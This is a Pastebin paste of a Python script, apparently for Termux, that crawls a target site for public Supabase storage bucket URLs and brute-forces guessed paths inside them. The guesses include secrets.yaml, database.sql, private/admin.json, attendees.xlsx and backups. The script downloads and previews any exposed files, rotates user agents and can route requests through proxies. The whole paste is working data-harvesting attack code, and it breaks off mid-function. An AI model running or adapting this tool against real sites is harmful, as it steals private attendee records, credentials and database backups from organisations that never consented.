Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import json
- import requests
- import os
- import time
- import hashlib
- import re
- import asyncio
- import aiohttp
- from urllib.parse import urlparse, urljoin
- import argparse
- from datetime import datetime
- import mimetypes
- import itertools
- from pathlib import Path
- import concurrent.futures
- import subprocess
- import random
- import zipfile
- try:
- from tqdm import tqdm
- except ImportError:
- tqdm = lambda x, **kwargs: x
- try:
- import PyPDF2
- except ImportError:
- PyPDF2 = None
- try:
- from PIL import Image
- except ImportError:
- Image = None
- OUTPUT_DIR = os.path.expanduser("~/storage/shared/pwa_exploit_downloads")
- REPORT_FILE = os.path.expanduser("~/storage/shared/pwa_exploit_report.json")
- CSV_FILE = os.path.expanduser("~/storage/shared/pwa_exploit_report.csv")
- HTML_FILE = os.path.expanduser("~/storage/shared/pwa_exploit_report.html")
- LOG_FILE = os.path.expanduser("~/storage/shared/pwa_exploit.log")
- ERROR_LOG = os.path.expanduser("~/storage/shared/pwa_exploit_errors.log")
- CONFIG_FILE = os.path.expanduser("~/storage/shared/pwa_exploit_config.json")
- TIMEOUT = 15
- MAX_ATTEMPTS = 500
- RATE_LIMIT_DELAY = 0.5
- MAX_RETRIES = 3
- MAX_WORKERS = 2
- ALLOWED_FILE_TYPES = ['image/jpeg', 'image/png', 'image/webp', 'application/pdf', 'application/json', 'application/zip', 'text/plain', 'text/csv']
- ALLOWED_EXTENSIONS = ['.jpg', '.jpeg', '.png', '.webp', '.pdf', '.json', '.zip', '.txt', '.csv']
- MAX_FILE_SIZE = 5 * 1024 * 1024
- USER_AGENTS = [
- 'Mozilla/5.0 (Linux; Android 10; SM-G960F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.120 Mobile Safari/537.36',
- 'Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
- 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'
- ]
- async def async_get(url, proxy=None, timeout=TIMEOUT):
- try:
- async with aiohttp.ClientSession(headers={'User-Agent': random.choice(USER_AGENTS)}) as session:
- if proxy:
- session.connector = aiohttp.TCPConnector(ssl=False) if proxy.startswith('http://') else None
- response = await session.get(url, proxy=proxy, timeout=timeout)
- else:
- response = await session.get(url, timeout=timeout)
- response.raise_for_status()
- return await response.text(), response.headers.get('content-type', 'unknown'), response.status
- except:
- return None, None, None
- def log_message(message, verbose=False, quiet=False):
- if not quiet:
- print(message)
- with open(LOG_FILE, 'a') as f:
- f.write(f"{datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S UTC')} - {message.replace('\033[0m', '').replace('\033[31m', '').replace('\033[32m', '').replace('\033[33m', '').replace('\033[36m', '')}\n")
- def log_error(message):
- with open(ERROR_LOG, 'a') as f:
- f.write(f"{datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S UTC')} - {message}\n")
- def check_termux_storage():
- try:
- subprocess.run(["termux-setup-storage"], shell=True, check=False)
- time.sleep(2)
- shared_dir = os.path.expanduser("~/storage/shared")
- if os.path.exists(shared_dir) and os.access(shared_dir, os.W_OK):
- return shared_dir
- home_dir = os.path.expanduser("~/")
- if os.access(home_dir, os.W_OK):
- return home_dir
- raise Exception("No writable directory found")
- except Exception as e:
- log_error(f"Storage check failed: {e}")
- return os.path.expanduser("~/")
- def notify_termux(message):
- try:
- subprocess.run(["termux-toast", message], check=False)
- except:
- pass
- def get_free_space(path):
- try:
- stat = os.statvfs(path)
- return stat.f_bavail * stat.f_frsize
- except:
- return float('inf')
- def sanitize_filename(filename):
- invalid_chars = '<>:"/\\|?*'
- for char in invalid_chars:
- filename = filename.replace(char, '_')
- return filename[:255]
- def clean_storage(output_dir, quiet=False, ultra_low_memory=False):
- if ultra_low_memory:
- return
- if get_free_space(output_dir) < MAX_FILE_SIZE * 2:
- log_message("\033[33m[*] Low storage detected, cleaning up ⏳\033[0m", quiet=quiet)
- try:
- for f in os.listdir(output_dir):
- try:
- os.remove(os.path.join(output_dir, f))
- except:
- pass
- log_message("\033[32m[+] Storage cleaned successfully ✅\033[0m", quiet=quiet)
- notify_termux("Storage cleaned")
- except Exception as e:
- log_error(f"Storage cleanup failed: {e}")
- log_message("\033[31m[-] Failed to clean storage ❌\033[0m", quiet=quiet)
- def load_config():
- default_config = {
- 'timeout': TIMEOUT,
- 'max_attempts': MAX_ATTEMPTS,
- 'max_file_size': MAX_FILE_SIZE,
- 'allowed_extensions': ALLOWED_EXTENSIONS,
- 'wordlist': ['public', 'assets', 'speakers', 'backups', 'data', 'cfp', 'tickets', 'sponsors', 'workshops', 'archive']
- }
- try:
- if os.path.exists(CONFIG_FILE):
- with open(CONFIG_FILE, 'r') as f:
- return json.load(f)
- with open(CONFIG_FILE, 'w') as f:
- json.dump(default_config, f, indent=2)
- return default_config
- except:
- return default_config
- async def discover_manifest(domain, proxy=None, verbose=False, quiet=False):
- try:
- text, _, _ = await async_get(domain, proxy)
- if not text:
- log_message("\033[31m[-] Failed to fetch domain for manifest discovery ❌\033[0m", verbose, quiet)
- return None
- manifest_url = re.search(r'<link[^>]+rel=["\']manifest["\'][^>]+href=["\'](.*?)["\']', text)
- if manifest_url:
- manifest_url = urljoin(domain, manifest_url.group(1))
- log_message(f"\033[32m[+] Discovered manifest: {manifest_url} ✅\033[0m", verbose, quiet)
- return manifest_url
- for path in ['/manifest.json', '/app.webmanifest', '/site.webmanifest']:
- url = urljoin(domain, path)
- text, content_type, status = await async_get(url, proxy)
- if status == 200 and content_type.startswith('application'):
- log_message(f"\033[32m[+] Discovered manifest: {url} ✅\033[0m", verbose, quiet)
- return url
- log_message("\033[31m[-] No manifest found on domain ❌\033[0m", verbose, quiet)
- return None
- except Exception as e:
- log_error(f"Manifest discovery failed: {e}")
- log_message(f"\033[31m[-] Error discovering manifest: {e} ❌\033[0m", verbose, quiet)
- return None
- async def parse_manifest(manifest_path_or_url, proxy=None, verbose=False, quiet=False):
- try:
- if manifest_path_or_url.startswith('http'):
- text, content_type, status = await async_get(manifest_path_or_url, proxy)
- if status != 200 or not content_type.startswith('application'):
- raise Exception("Invalid manifest response")
- manifest_data = json.loads(text)
- else:
- with open(manifest_path_or_url, 'r') as f:
- manifest_data = json.load(f)
- icons = [icon['src'] for icon in manifest_data.get('icons', []) if 'src' in icon]
- log_message(f"\033[32m[+] Found {len(icons)} icon(s) ✅\033[0m", verbose, quiet)
- return icons, manifest_data.get('start_url', '')
- except Exception as e:
- log_error(f"Manifest parsing failed: {e}")
- log_message(f"\033[31m[-] Error parsing manifest: {e} ❌\033[0m", verbose, quiet)
- return [], ''
- async def crawl_parent_domain(domain, proxy=None, verbose=False, quiet=False):
- try:
- urls = set([domain])
- supabase_urls = set()
- visited = set()
- depth = 0
- while urls and depth < 2:
- current_urls = list(urls)
- urls.clear()
- depth += 1
- log_message(f"\033[33m[*] Crawling {domain} at depth {depth}/2... ⏳\033[0m", verbose, quiet)
- tasks = [async_get(url, proxy) for url in current_urls if url not in visited]
- for future in asyncio.as_completed(tasks):
- text, content_type, _ = await future
- if not text:
- continue
- url = current_urls[tasks.index(future)]
- visited.add(url)
- if content_type.startswith('text/html'):
- links = re.findall(r'href=["\'](.*?)["\']', text) + re.findall(r'src=["\'](.*?)["\']', text)
- for link in links:
- if link.startswith('http') or link.startswith('/'):
- new_url = urljoin(domain, link)
- if domain in new_url and new_url not in visited:
- urls.add(new_url)
- matches = re.findall(r'https?://[a-z0-9]+\.supabase\.co/storage/v1/object/public/[^"\s>]+', text)
- supabase_urls.update(matches)
- log_message(f"\033[32m[+] Found {len(matches)} Supabase URLs in {url} ✅\033[0m", verbose, quiet)
- for path in ['/robots.txt', '/sitemap.xml']:
- url = urljoin(domain, path)
- if url in visited:
- continue
- text, _, _ = await async_get(url, proxy)
- if text:
- visited.add(url)
- if path == '/robots.txt':
- urls.update(urljoin(domain, line.split(': ')[1]) for line in text.split('\n') if line.startswith('Allow:') or line.startswith('Sitemap:'))
- elif path == '/sitemap.xml':
- urls.update(re.findall(r'<loc>(.*?)</loc>', text))
- log_message(f"\033[32m[+] Found {len(urls)} URLs from {url} ✅\033[0m", verbose, quiet)
- return supabase_urls
- except Exception as e:
- log_error(f"Parent domain crawling failed: {e}")
- log_message(f"\033[31m[-] Error crawling parent domain: {e} ❌\033[0m", verbose, quiet)
- return set()
- async def is_publicly_accessible(url, proxy=None):
- for attempt in range(MAX_RETRIES):
- try:
- async with aiohttp.ClientSession(headers={'User-Agent': random.choice(USER_AGENTS)}) as session:
- if proxy:
- session.connector = aiohttp.TCPConnector(ssl=False) if proxy.startswith('http://') else None
- response = await session.head(url, allow_redirects=True, proxy=proxy, timeout=TIMEOUT)
- else:
- response = await session.head(url, allow_redirects=True, timeout=TIMEOUT)
- if response.status == 200:
- content_type = response.headers.get('content-type', 'unknown')
- content_length = int(response.headers.get('content-length', 0))
- if content_length > MAX_FILE_SIZE or not any(url.lower().endswith(ext) for ext in ALLOWED_EXTENSIONS):
- return False, None
- return True, content_type
- return False, None
- except Exception as e:
- log_error(f"Accessibility check failed for {url}: {e}")
- await asyncio.sleep(RATE_LIMIT_DELAY * (2 ** attempt) * random.uniform(0.8, 1.2))
- return False, None
- def extract_bucket_info(supabase_url):
- parsed = urlparse(supabase_url)
- path_parts = parsed.path.strip('/').split('/')
- if len(path_parts) >= 4 and path_parts[0] == 'storage' and path_parts[1] == 'v1' and path_parts[2] == 'object':
- project_ref = parsed.netloc.split('.')[0]
- bucket = path_parts[3]
- prefix = '/'.join(path_parts[4:]) if len(path_parts) > 4 else ''
- return project_ref, bucket, prefix
- return None, None, None
- def generate_common_paths(config):
- base_paths = [
- 'index.html', 'manifest.json', 'sw.js', 'robots.txt',
- 'logo.png', 'icon.svg', 'banner.jpg', 'favicon.ico',
- 'config.json', 'secrets.yaml', 'backup.zip', 'database.sql',
- 'public/avatars/avatar.jpg', 'private/admin.json',
- 'assets/schedule.pdf', 'speakers/bios.txt', 'tickets.csv'
- ]
- dynamic_paths = [f"img_{i}.{ext}" for i in range(1, 25) for ext in config['allowed_extensions']]
- conference_paths = [f"assets/conference_{year}.pdf" for year in range(2020, 2030)] + [
- f"speakers/speaker_{i}.jpg" for i in range(1, 30)
- ] + ['cfp_submissions.zip', 'attendees.xlsx', 'schedule.json', 'event_logo.png', 'sponsors.pdf', 'workshops.pdf', 'keynote.pptx', 'badges.pdf']
- dir_brute = [f"{prefix}/" for prefix in config['wordlist'] + ['events', '2025', 'uploads', 'private']]
- return base_paths + dynamic_paths + conference_paths + dir_brute
- def calculate_file_hash(file_path):
- sha256 = hashlib.sha256()
- try:
- with open(file_path, 'rb') as f:
- for chunk in iter(lambda: f.read(4096), b''):
- sha256.update(chunk)
- return sha256.hexdigest()
- except:
- return 'unknown'
- def extract_file_content(file_path, content_type, low_memory, ultra_low_memory):
- if low_memory or ultra_low_memory:
- return 'Skipped due to low-memory mode'
- try:
- if content_type == 'application/pdf' and PyPDF2:
- with open(file_path, 'rb') as f:
- pdf = PyPDF2.PdfReader(f)
- text = ''.join(page.extract_text() or '' for page in pdf.pages[:2])
- return text[:500] or 'No text extracted'
- elif content_type in ['image/jpeg', 'image/png', 'image/webp'] and Image:
- with Image.open(file_path) as img:
- return f"Image metadata: {img.format}, {img.size}, {img.mode}"
- elif content_type in ['text/plain', 'text/csv', 'application/json']:
- with open(file_path, 'r', errors='ignore') as f:
- return f.read(500)
- return 'No content extracted'
- except Exception as e:
- log_error(f"Content extraction failed for {file_path}: {e}")
- return 'Error extracting content'
- async def download_file(url, output_dir=OUTPUT_DIR, proxy=None, verbose=False, quiet=False, low_memory=False, ultra_low_memory=False, test=False):
- if test or ultra_low_memory:
- log_message(f"\033[32m[+] Simulated download: {url} ✅\033[0m", verbose, quiet)
- return {'url': url, 'file': 'simulated', 'size': 0, 'type': 'unknown', 'hash': 'unknown', 'content_preview': 'simulated'}
- try:
- if get_free_space(output_dir) < MAX_FILE_SIZE:
- clean_storage(output_dir, quiet, ultra_low_memory)
- log_message(f"\033[31m[-] Insufficient storage in {output_dir} ❌\033[0m", verbose, quiet)
- return None
- os.makedirs(output_dir, exist_ok=True, mode=0o755)
- filename = os.path.join(output_dir, sanitize_filename(os.path.basename(urlparse(url).path)))
- for attempt in range(MAX_RETRIES):
- try:
- async with aiohttp.ClientSession(headers={'User-Agent': random.choice(USER_AGENTS)}) as session:
- if proxy:
- session.connector = aiohttp.TCPConnector(ssl=False) if proxy.startswith('http://') else None
- response = await session.get(url, proxy=proxy, timeout=TIMEOUT)
- else:
- response = await session.get(url, timeout=TIMEOUT)
- response.raise_for_status()
- content_type = response.headers.get('content-type', 'unknown')
- if content_type not in ALLOWED_FILE_TYPES or not any(url.lower().endswith(ext) for ext in ALLOWED_EXTENSIONS):
- log_message(f"\033[31m[-] Invalid file type: {url} ({content_type}) ❌\033[0m", verbose, quiet)
- return None
- total_size = 0
- with open(filename, 'wb') as f:
- async for chunk in response.content.iter_chunked(8192):
- if total_size + len(chunk) > MAX_FILE_SIZE:
- log_message(f"\033[31m[-] File too large: {url} ❌\033[0m", verbose, quiet)
- return None
- f.write(chunk)
- total_size += len(chunk)
- file_hash = calculate_file_hash(filename)
- content_preview = extract_file_content(filename, content_type, low_memory, ultra_low_memory)
- log_message(f"\033[32m[+] Downloaded: {filename} (Size: {total_size} bytes, Type: {content_type}, SHA-256: {file_hash[:16]}...) ✅\033[0m", verbose, quiet)
- log_message(f"\033[36m Content preview: {content_preview[:100]}...\033[0m", verbose, quiet)
- return {'url': url, 'file': filename, 'size': total_size, 'type': content_type, 'hash': file_hash, 'content_preview': content_preview}
- except Exception as e:
- log_error(f"Download attempt {attempt + 1} failed for {url}: {e}")
- log_message(f"\033[31m[-] Download attempt {attempt + 1} failed for {url}: {e} ❌\033[0m", verbose, quiet)
- await asyncio.sleep(RATE_LIMIT_DELAY * (2 ** attempt) * random.uniform(0.8, 1.2))
- log_message(f"\033[31m[-] Failed to download {url} after {MAX_RETRIES} attempts ❌\033[0m", verbose, quiet)
- return None
- except Exception as e:
- log_error(f"Download failed for {url}: {e}")
- log_message(f"\033[31m[-] Error downloading {url}: {e} ❌\033[0m", verbose, quiet)
- return None
- async def parallel_enumerate(urls, project_ref, bucket, proxy, verbose, quiet, no_progress, low_memory, ultra_low_memory, test):
- found_files = []
- iterator = urls if no_progress else tqdm(urls, desc="Enumerating paths")
- tasks = [is_publicly_accessible(url, proxy) for url in iterator]
- for future in asyncio.as_completed(tasks):
- url = iterator[tasks.index(future)] if no_progress else next(itertools.islice(iterator, tasks.index(future), None))
- accessible, content_type = await future
- await asyncio.sleep(RATE_LIMIT_DELAY * random.uniform(0.8, 1.2))
- if accessible and content_type in ALLOWED_FILE_TYPES:
- path = url.replace(f"https://{project_ref}.supabase.co/storage/v1/object/public/{bucket}/", "")
- found_files.append((url, path, content_type))
- log_message(f"\033[32m[+] Exposed file: {url} (Type: {content_type}) ✅\033[0m", verbose, quiet)
- else:
- log_message(f"\033[31m[-] Not accessible or invalid type: {url} ❌\033[0m", verbose, quiet)
- if len(found_files) >= load_config()['max_attempts']:
- break
- return found_files
- async def recursive_crawl(base_url, project_ref, bucket, prefix, proxy, verbose, quiet, no_progress, low_memory, ultra_low_memory, test):
- found_files = []
- directories = set([prefix]) if prefix else set([''])
- visited = set()
- depth = 0
- config = load_config()
- while directories and depth < 3:
- current_dirs = list(directories)
- directories.clear()
- depth += 1
- log_message(f"\033[33m[*] Crawling depth {depth}/3 with {len(current_dirs)} directories... ⏳\033[0m", verbose, quiet)
- for dir_path in current_dirs:
- paths = generate_common_paths(config)
- urls = [urljoin(f"https://{project_ref}.supabase.co/storage/v1/object/public/{bucket}/", f"{dir_path}/{path}" if dir_path else path) for path in paths]
- found_files.extend(await parallel_enumerate(urls, project_ref, bucket, proxy, verbose, quiet, no_progress, low_memory, ultra_low_memory, test))
- for url, path, content_type in found_files:
- if not any(path.endswith(ext) for ext in config['allowed_extensions']):
- directories.add(path)
- visited.add(path)
- if len(found_files) >= config['max_attempts']:
- log_message(f"\033[31m[!] Reached max attempts, stopping enumeration ❌\033[0m", verbose, quiet)
Advertisement
Add Comment
Please, Sign In to add comment